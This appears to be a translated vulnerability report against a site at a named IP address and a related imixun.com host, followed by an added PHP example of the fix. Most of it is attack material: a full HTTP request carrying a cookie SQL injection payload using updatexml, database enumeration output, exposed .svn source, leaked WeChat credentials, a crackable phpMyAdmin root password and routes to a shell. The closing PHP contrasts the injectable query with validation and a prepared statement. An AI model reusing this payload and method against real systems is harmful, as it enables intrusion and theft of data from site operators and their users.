Toutiao's website cookie injection + Source Code leakage + getshell + key Leakage
http://42.96.190.138/
This site has SQL injection, and there is likely more than one injection point.
The cookie injection request is as follows:

GET /index.php?g=WEBAPP&m=Index&a=getCategoryPagePropertyDepartment HTTP/1.1
Host: 42.96.190.138
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2376.0 Safari/537.36
Accept: */*
Referer: http://42.96.190.138:3333/index.php?g=WEBAPP&page=cusform-formlist&dept_id=1%20and%201=if(1=2,1,(select%201%20union%20select%202))
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ja;q=0.2
Cookie: PHPSESSID=sqr24iplkeltnokj5g43q7et52; YP_onlineid=%22796df709c9c89a5d3e0e44e600a3efb8%22; last_update_time=2015-04-30+11%3A47%3A55; dept_id=11119 and 1=(updatexml(1,concat(0x3a,(select user() from mysql.user)),1)); YP_think_language=%22cn%22
available databases [2]:
[*] information_schema
[*] ttbdxt

[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150426
[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150427
[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150422
[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150424
[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150425
[11:59:42] [INFO] retrieved: imi_activity_count_url
[11:59:42] [INFO] retrieved: imi_activity_log
[11:59:42] [INFO] retrieved: imi_activity_prize55122
[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150429
[11:59:42] [INFO] retrieved: imi_activity_prize_record55122
[11:59:42] [INFO] retrieved: imi_activity_record55122
[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150428
[11:59:42] [INFO] retrieved: imi_app_log
[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150430
[11:59:42] [INFO] retrieved: imi_block
[11:59:42] [INFO] retrieved: imi_cart
[11:59:42] [INFO] retrieved: imi_category
[11:59:42] [INFO] retrieved: imi_attachment
The data is updated daily (note the date-suffixed tables).

The imi_config table was found; some of its rows:
|   | Minimum Image Width      | 0 | http://appadmin.imixun.com/                                                         | watermark_minwidth  |
| 5 | CMS address              | 0 | https://download.imixun.com/index.php?m=Download&appcode=ttbdxt&publishtype=online | site_url            |
| 5 | watermark minimum height | 0 | https://download.imixun.com/index.php?m=Download&appcode=ttbdxt&publishtype=online | watermark_minheight |
Downloaded it and captured the traffic:

ttbdxt.imixun.com/index.php?g=API&m=GetActivityDetail

ttbdxt.imixun.com
This site has the same injection, and here the database runs as root, so it gives a shell directly.
Back to 42.96.190.138:

http://42.96.190.138/.svn/entries
Source code leakage.

The WeChat (weixin) appid and secret are leaked as well.
Although the injection on this site is not running as root, phpMyAdmin is exposed at http://42.96.190.138/phpmyadmin, and the root password can be cracked.
A quick audit of the code also turns up a way to get a shell, and CREATE FUNCTION can be used to write a shell as well.
Solution:

Remove the .svn directory, fix the weak password, and filter parameters.
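As an added example (not the site's code), the PHP below shows the pattern behind the cookie injection above, where the dept_id cookie is concatenated into the SQL text, next to the parameter filtering the solution calls for: validate the cookie as an integer and bind it in a prepared statement. The table and column names (imi_category, dept_id) are assumptions; the runnable check at the bottom uses an in-memory SQLite database with constructed rows.

```php
<?php
// Added example, not the site's code. Models a handler that reads dept_id from
// the cookie (as the report's request does) and queries the imi_* schema.
// Table and column names are assumptions for illustration.

// Vulnerable pattern: the raw cookie value is interpolated into the SQL text, so
// a value such as "11119 and 1=(updatexml(...))" becomes part of the WHERE clause.
function buildQueryUnsafe(string $deptIdFromCookie): string
{
    return "SELECT id, name FROM imi_category WHERE dept_id = " . $deptIdFromCookie;
}

// Hardened form, step 1: the value must be a plain positive integer. Anything
// else (including the payload from the report) is rejected before SQL is built.
function parseDeptId(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hardened form, step 2: even a validated integer is bound as a parameter, so the
// SQL text is fixed and the value can never change the query structure.
function fetchCategories(PDO $db, string $rawCookie): array
{
    $deptId = parseDeptId($rawCookie);
    if ($deptId === null) {
        // Log the rejected value hex-encoded (so log viewers are not fed raw input)
        // and answer 400 without a database error; the report's payload relies on
        // the MySQL error message being returned to the client.
        error_log('rejected dept_id cookie value: ' . bin2hex(substr($rawCookie, 0, 64)));
        http_response_code(400);
        return [];
    }
    $stmt = $db->prepare('SELECT id, name FROM imi_category WHERE dept_id = :dept_id');
    $stmt->bindValue(':dept_id', $deptId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Self-contained check with constructed sample data in an in-memory SQLite DB.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE imi_category (id INTEGER PRIMARY KEY, name TEXT, dept_id INTEGER)');
$db->exec("INSERT INTO imi_category (name, dept_id) VALUES ('news', 11119), ('sports', 2)");

// A legitimate cookie value is accepted and bound.
var_dump(fetchCategories($db, '11119'));

// The cookie value from the report is rejected before it reaches SQL.
$payload = '11119 and 1=(updatexml(1,concat(0x3a,(select user() from mysql.user)),1))';
var_dump(parseDeptId($payload));
var_dump(fetchCategories($db, $payload));

// For contrast, the unsafe builder happily embeds the same value in the query text.
echo buildQueryUnsafe($payload), PHP_EOL;
```

Run it with the php CLI (pdo_sqlite is needed for the self-check). fetchCategories() returns the single constructed row for the value 11119 and an empty array for the report's cookie payload, which parseDeptId() refuses because FILTER_VALIDATE_INT only accepts a bare integer. Answering 400 instead of surfacing the database error also removes the channel an updatexml() payload reads its result from; the prepared statement is what makes the query safe even if validation were later loosened.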